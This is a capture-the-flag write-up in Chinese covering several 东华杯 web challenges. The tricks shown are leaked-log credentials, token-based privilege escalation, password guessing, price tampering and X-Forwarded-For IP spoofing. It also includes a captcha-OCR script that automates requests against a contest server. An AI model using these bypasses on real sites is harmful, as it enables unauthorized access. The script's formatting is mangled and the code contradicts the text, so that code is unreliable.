东华杯
Web1 仔细
用dirsearch扫一波目录,发现/log/access.log
curl下载下来
172.16.3.1 - - [12/Oct/2016:07:54:48 +0000] "GET /wojiushiHouTai888/denglU.php?username=admin&password=af3a-6b2115c9a2c0&submit=%E7%99%BB%E5%BD%95 HTTP/1.1" 200 771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
直接访问,得flag
flag{ff11025b-ed80-4c42-afc1-29b4c41010cb}
Web2 跳
越权
在登陆test test账户时,可以看到看到一个token:test2的md5值
带着这个md5访问admin.php 就可以得到flag
Web 威胁 1
admin
爆破密码20160807
Web 威胁2
查看session发现个guest用户
试密码123456登录上去莫名得到了flag
Web 物超所值
修改返回包,把所有的钱改成0.001 保证能发出post包
post数据改为id=0.01&Price=0.01
就会弹flag
Web 抢金币
写脚本抢金币, 但是抢劫会被抓
停顿很久发现在最后一步使用result2 = s2.head(url2,data=payload, headers=header).content而非post就不会被抓.
脚本如下:
#!/usr/bin/python
# -- coding:utf-8 --
'''
image =Image.open('vcode.png')
vcode =pytesseract.image_to_string(image)
print vcode
'''
import re
try:
import requests
exceptImportError:
raise SystemExit('\n[!] requests模块导入错误,请执行pipinstall requests安装!')
try:
import pytesseract
from PIL import Image
exceptImportError:
print '模块导入错误,请使用pip安装,pytesseract依赖以下库:'
print'http://www.lfd.uci.edu/~gohlke/pythonlibs/#pil'
print'http://code.google.com/p/tesseract-ocr/'
raise SystemExit
try:
while 1:
s = requests.Session()
url1 ='http://120.132.85.112:8888/rob.php'
url2 = 'http://120.132.85.112:8888/dorob.php'
captchaUrl ='http://120.132.85.112:8888/code.php'
pattern = re.compile(r'<inputtype="hidden" name="user" value=".*">')
for userId in [4, 2, 3, 48, 1,49,58,97,98,38,36,28,114, 20, 72, 77,20,66,63,104, 31,104, 70,39]:
#print userId
header = {'Cookie':'PHPSESSID=fmdsad90jg0ss8aor5ef29blh7'}
result1 = s.get(url1, params={'id':str(userId)}, headers=header).content
matchResult =pattern.search(result1)
if matchResult:
captchaImage =s.get(captchaUrl, headers=header).content
with open('captcha.png','wb')as f:
f.write(captchaImage)
imageFile =Image.open('captcha.png')
#print imageFile
code =pytesseract.image_to_string(imageFile, lang="eng")
#print code
userName =matchResult.group().split('"')[5]
payload = {'user': userName,'num': '1', 'code': code}
s2 = requests.Session()
result2 = s2.post(url2,data=payload, headers=header).content
print result2
'''
r = s.post(url1, data=payload,headers=header)
if 'error' not in r.content:
print '\n爷,正确密码为:', pwd
print '\n' + r.content
break
else:
print '正在尝试密码:', pwd
'''
exceptKeyboardInterrupt:
raise SystemExit('大爷,按您的吩咐,已成功退出!')
Web分析
http://120.132.85.112:1999/administrator.php 能够访问管理页面 在管理页面前端源码里能找到默认账号密码 administrator administrator 登录提示IP不在许可范围 X-Forwarded-For伪造IP为127.0.0.1 得到flag